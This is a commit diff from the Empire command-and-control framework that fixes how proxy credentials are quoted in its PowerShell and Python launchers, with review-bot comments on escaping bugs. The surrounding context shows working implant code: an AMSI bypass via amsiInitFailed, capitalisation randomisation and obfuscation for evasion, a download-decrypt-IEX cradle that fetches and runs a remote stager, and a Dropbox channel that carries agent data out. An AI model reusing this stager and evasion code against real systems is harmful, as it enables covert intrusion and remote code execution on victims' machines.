Merge pull request #728 from dirkjanm/dev

Fixed custom proxy config in launcher code
websockets-multiuser
Steve Borosh 2017-09-30 11:31:15 -04:00 committed by GitHub
commit 223079597c
4 changed files with 32 additions and 32 deletions


@ -222,7 +222,7 @@ class Listener:
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
domain = username.split('\\')[0] domain = username.split('\\')[0]
usr = username.split('\\')[1] usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent #save the proxy settings to use during the entire staging process and the agent
@ -307,7 +307,7 @@ class Listener:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0] username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else: else:
launcherBase += "o = urllib2.build_opener(proxy);\n" launcherBase += "o = urllib2.build_opener(proxy);\n"
@ -484,7 +484,7 @@ class Listener:
#strip out comments and blank lines #strip out comments and blank lines
code = helpers.strip_python_comments(code) code = helpers.strip_python_comments(code)
#patch some more #patch some more
code = code.replace('delay = 60', 'delay = %s' % (delay)) code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter)) code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile)) code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
@ -661,16 +661,16 @@ def send_message(packets=None):
except: except:
pass pass
if packets: if packets:
data = ''.join(packets) data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py # aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data) encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
#check to see if there are any results already present #check to see if there are any results already present
headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID) headers['Dropbox-API-Arg'] = "{\\"path\\":\\"%s/%s.txt\\"}" % (resultsFolder, sessionID)
try: try:
pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers) pkdata = post_message('https://content.dropboxapi.com/2/files/download', data=None, headers=headers)
except: except:
@ -953,7 +953,7 @@ def send_message(packets=None):
dbx.files_delete(fileName) dbx.files_delete(fileName)
except dropbox.exceptions.ApiError: except dropbox.exceptions.ApiError:
dispatcher.send("[!] Error deleting data at '%s'" % (fileName), sender="listeners/dropbox") dispatcher.send("[!] Error deleting data at '%s'" % (fileName), sender="listeners/dropbox")
self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions) self.mainMenu.agents.handle_agent_data(stagingKey, responseData, listenerOptions)
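Review bot: The quoted add_password line in the @@ -307 hunk still splices `proxy`, `username` and `password` into a Python single-quoted literal without escaping, so a password containing `'` or `\` produces a launcher that fails to parse, and a crafted value can close the literal and alter the generated code; emit repr-escaped values instead, `launcherBase += "proxy_auth_handler.add_password(None,%r,%r,%r);\n" % (proxy, username, password)`. The `proxyCreds.split(':')[1]` line just above also truncates any password that itself contains a `:`; `username, password = proxyCreds.split(':', 1)` keeps the whole secret. As far as I can tell from urllib2's source, the default `HTTPPasswordMgr` behind `ProxyBasicAuthHandler()` only returns credentials stored under realm `None` when the proxy's 407 challenge also carries no realm, so a realm-bearing proxy would never be authenticated to; `urllib2.ProxyBasicAuthHandler(urllib2.HTTPPasswordMgrWithDefaultRealm())` avoids that. The enclosing method starts before and ends after the hunk.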


@ -243,7 +243,7 @@ class Listener:
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
domain = username.split('\\')[0] domain = username.split('\\')[0]
usr = username.split('\\')[1] usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent #save the proxy settings to use during the entire staging process and the agent
@ -259,7 +259,7 @@ class Listener:
if "https" in host: if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port) host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else: else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port) host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array # code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
@ -296,7 +296,7 @@ class Listener:
# decode everything and kick it over to IEX to kick off execution # decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX") stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate: if obfuscate:
stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand) stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it # base64 encode the stager and return it
@ -338,7 +338,7 @@ class Listener:
# prebuild the request routing packet for the launcher # prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='') routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket) b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n" launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie # add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n" launcherBase += "req.add_header('User-Agent',UA);\n"
@ -352,7 +352,7 @@ class Listener:
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue) #launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue) launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none": if proxy.lower() != "none":
if proxy.lower() == "default": if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n" launcherBase += "proxy = urllib2.ProxyHandler();\n"
@ -367,7 +367,7 @@ class Listener:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0] username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else: else:
launcherBase += "o = urllib2.build_opener(proxy);\n" launcherBase += "o = urllib2.build_opener(proxy);\n"
@ -378,7 +378,7 @@ class Listener:
launcherBase += "urllib2.install_opener(o);\n" launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV # download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n" launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];" launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];" launcherBase += "data=a[4:];"
@ -419,8 +419,8 @@ class Listener:
if not language: if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!') print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None return None
profile = listenerOptions['DefaultProfile']['Value'] profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')] uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value'] launcher = listenerOptions['Launcher']['Value']
@ -475,7 +475,7 @@ class Listener:
randomizedStager += helpers.randomize_capitalization(line) randomizedStager += helpers.randomize_capitalization(line)
else: else:
randomizedStager += line randomizedStager += line
if obfuscate: if obfuscate:
randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand) randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it # base64 encode the stager and return it
@ -638,7 +638,7 @@ class Listener:
if($Script:Proxy) { if($Script:Proxy) {
$wc.Proxy = $Script:Proxy; $wc.Proxy = $Script:Proxy;
} }
$wc.Headers.Add("User-Agent",$script:UserAgent) $wc.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)} $script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie") $wc.Headers.Add("Cookie", "session=$RoutingCookie")
@ -680,7 +680,7 @@ class Listener:
if($Script:Proxy) { if($Script:Proxy) {
$wc.Proxy = $Script:Proxy; $wc.Proxy = $Script:Proxy;
} }
$wc.Headers.Add('User-Agent', $Script:UserAgent) $wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)} $Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
@ -783,7 +783,7 @@ def send_message(packets=None):
app = Flask(__name__) app = Flask(__name__)
self.app = app self.app = app
@app.route('/<string:stagerURI>') @app.route('/<string:stagerURI>')
def send_stager(stagerURI): def send_stager(stagerURI):
if stagerURI: if stagerURI:
@ -987,4 +987,4 @@ def send_message(packets=None):
self.threads[name].kill() self.threads[name].kill()
else: else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])) print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill() self.threads[self.options['Name']['Value']].kill()
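Review bot: The NetworkCredential line in the @@ -243 hunk wraps `usr`, `password` and `domain` in PowerShell single quotes but does not escape them, so a password containing `'` breaks the stager and, because the value is spliced in raw, can terminate the literal and change the generated script; double embedded quotes first, e.g. `password = password.replace("'", "''")` (and the same for `usr` and `domain`) before building `$netcred`. The context lines just above carry two further edge cases the commit leaves in place: `username.split('\\')[1]` raises IndexError when ProxyCreds has no `DOMAIN\` prefix, and `proxyCreds.split(':')[1]` drops everything after a second `:`, so `proxyCreds.split(':', 1)` and a guard on `'\\' in username` are needed. The enclosing method starts before and ends after this hunk.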


@ -141,7 +141,7 @@ class Listener:
uris = [a for a in profile.split('|')[0].split(',')] uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris) stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:] customHeaders = profile.split('|')[2:]
if language.startswith('po'): if language.startswith('po'):
# PowerShell # PowerShell
@ -164,7 +164,7 @@ class Listener:
stager += "'amsiInitFailed','NonPublic,Static'" stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};") stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;") stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;") stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default': if userAgent.lower() == 'default':
@ -198,7 +198,7 @@ class Listener:
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
domain = username.split('\\')[0] domain = username.split('\\')[0]
usr = username.split('\\')[1] usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
# TODO: reimplement stager retries? # TODO: reimplement stager retries?
@ -210,7 +210,7 @@ class Listener:
headerValue = header.split(':')[1] headerValue = header.split(':')[1]
stager += helpers.randomize_capitalization("$wc.Headers.Add(") stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue) stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# code to turn the key string into a byte array # code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(") stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey) stager += "'%s');" % (stagingKey)
@ -294,7 +294,7 @@ class Listener:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0] username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else: else:
launcherBase += "o = urllib2.build_opener(proxy);\n" launcherBase += "o = urllib2.build_opener(proxy);\n"
@ -363,12 +363,12 @@ class Listener:
if language: if language:
if language.lower() == 'powershell': if language.lower() == 'powershell':
updateServers = """ updateServers = """
$Script:ControlServers = @("%s"); $Script:ControlServers = @("%s");
$Script:ServerIndex = 0; $Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value']) """ % (listenerOptions['Host']['Value'])
getTask = """ getTask = """
function script:Get-Task { function script:Get-Task {
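Review bot: The add_password line in the @@ -294 hunk quotes `proxy`, `username` and `password` into a Python literal without escaping, so a `'` or `\` in the password breaks the generated launcher; `%r` formatting, `launcherBase += "proxy_auth_handler.add_password(None,%r,%r,%r);\n" % (proxy, username, password)`, yields a correctly escaped literal for any value. Separately, and as far as I can tell from urllib2's source, `ProxyBasicAuthHandler()` defaults to a plain `HTTPPasswordMgr`, which looks credentials up by the realm in the proxy's 407 challenge and so never finds the entry stored under realm `None` unless the proxy sends no realm; `urllib2.ProxyBasicAuthHandler(urllib2.HTTPPasswordMgrWithDefaultRealm())` falls back to the `None` entry. The `proxyCreds.split(':')[1]` just above also truncates passwords containing `:`; `split(':', 1)` fixes that. The enclosing method starts before and ends after the hunk.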


@ -176,7 +176,7 @@ class Listener:
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
domain = username.split('\\')[0] domain = username.split('\\')[0]
usr = username.split('\\')[1] usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");" stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;") stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
# TODO: reimplement stager retries? # TODO: reimplement stager retries?
@ -247,7 +247,7 @@ class Listener:
# add the RC4 packet to a cookie # add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket) launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (b64RoutingPacket)
launcherBase += "import urllib2\n" launcherBase += "import urllib2\n"
if proxy.lower() != "none": if proxy.lower() != "none":
if proxy.lower() == "default": if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n" launcherBase += "proxy = urllib2.ProxyHandler();\n"
@ -262,7 +262,7 @@ class Listener:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n" launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0] username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1] password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n" launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else: else:
launcherBase += "o = urllib2.build_opener(proxy);\n" launcherBase += "o = urllib2.build_opener(proxy);\n"
@ -271,7 +271,7 @@ class Listener:
#install proxy and creds globally, so they can be used with urlopen. #install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n" launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV # download the stager and extract the IV
launcherBase += "a=o.open(server+t).read();" launcherBase += "a=o.open(server+t).read();"
launcherBase += "IV=a[0:4];" launcherBase += "IV=a[0:4];"